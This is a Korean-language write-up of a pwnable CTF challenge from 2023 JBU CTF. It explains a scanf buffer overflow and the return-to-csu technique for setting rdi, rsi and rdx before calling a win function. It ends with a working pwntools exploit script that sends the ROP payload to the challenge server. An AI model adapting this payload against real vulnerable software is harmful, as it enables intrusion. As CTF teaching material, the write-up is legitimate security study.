[2023 JBU CTF] call_func write-up

분야 : Pwnable

💡 2023 JBU CTF에서 출제한 문제에 대한 write-up이다.

😭 이 문제도 Csu Gadget을 이용하는 것이 목적인데, 해당 함수에서 검증 로직 이후 fopen을 해서, 해당 주소로 RET해주면 풀리게 된다... fopen을 앞에 해주고 인자 검증을 했어야 했는데.. ㅎㅎ

🧐 문제

문제명 : call_func

RTC 기법을 이해하고, 각 레지스터 값을 설정하고 함수를 호출하여 플래그를 얻는 문제이다.

 

위 구성이 문제파일로 제공된다. 로컬에서 도커 컨테이너를 올려 익스플로잇을 진행하고, 동일한 페이로드를 서버에 전송하면 플래그를 획득할 수 있다.

 

🧐 분석

보호 기법은 위와 같다. 문제 바이너리를 분석해보자.

 

main함수이다. scanf에서 bof가 발생한다.

 

win함수 만들어져 있고, 이 함수의 주소를 main함수 RET에 넣어서 호출한다. 하지만, 인자 3개를 넘겨받아 값이 다르면 프로그램을 종료시킨다.

 

따라서, 64bit 함수 호출 규약 순서인 rdi, rsi, rdx의 값을 설정해주고 함수를 호출해야 한다.

__libc_csu_init gadget을 이용하여 각 레지스터를 설정할 수 있다.

 

왼쪽은 스택에서 각 레지스터에 pop을 하는 gadget이고, 오른쪽에서 앞서 설정한 레지스터 값에서 edi, rsi, rdx를 복사하기 때문에 원하는 값 설정이 가능하다.

RTC (Return-to-csu) 기법

 

 

🧐 익스플로잇

from pwn import *

context.log_level='debug'

#p = process('./ret1')
e = ELF('./ret1')
p = remote('192.168.83.137', 13576)

csu_stage1 = 0x00000000004013fa
csu_stage2 = 0x00000000004013e0

ret_addr = 0x000000000040101a
win_addr = e.sym['ptr']

payload = b"A" * 0x48
payload += p64(ret_addr)
payload += p64(csu_stage1)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(0x44)
payload += p64(0x66)
payload += p64(0x88)
payload += p64(win_addr)
payload += p64(csu_stage2)

#gdb.attach(p)
#pause()

p.sendline(payload)

p.interactive()

해당 exploit 코드를 실행하면 플래그를 얻을 수 있다.